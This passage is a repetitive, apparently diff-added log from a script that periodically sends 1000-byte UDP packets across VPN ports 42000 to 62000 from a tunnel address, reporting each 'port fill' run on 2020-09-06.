+Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:43:06 +Starting port fill at 2020-09-06 10:44:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 10:44:07 +Starting port fill at 2020-09-06 10:45:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:45:05 +Starting port fill at 2020-09-06 10:46:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:46:05 +Starting port fill at 2020-09-06 10:47:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:47:05 +Starting port fill at 2020-09-06 10:48:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 10:48:07 +Starting port fill at 2020-09-06 10:49:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:49:05 +Starting port fill at 2020-09-06 10:50:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:50:04 +Starting port fill at 2020-09-06 10:51:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:51:04 +Starting port fill at 2020-09-06 10:52:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:52:04 +Starting port fill at 2020-09-06 10:53:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:53:04 +Starting port fill at 2020-09-06 10:54:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:54:06 +Starting port fill at 2020-09-06 10:55:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:55:06 +Starting port fill at 2020-09-06 10:56:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:56:04 +Starting port fill at 2020-09-06 10:57:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 10:57:06 +Starting port fill at 2020-09-06 10:58:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:58:05 +Starting port fill at 2020-09-06 10:59:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 10:59:04 +Starting port fill at 2020-09-06 11:00:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:00:04 +Starting port fill at 2020-09-06 11:01:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 11:01:07 +Starting port fill at 2020-09-06 11:02:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:02:05 +Starting port fill at 2020-09-06 11:03:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 11:03:07 +Starting port fill at 2020-09-06 11:04:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:04:06 +Starting port fill at 2020-09-06 11:05:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:05:05 +Starting port fill at 2020-09-06 11:06:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:06:05 +Starting port fill at 2020-09-06 11:07:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:07:05 +Starting port fill at 2020-09-06 11:08:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent 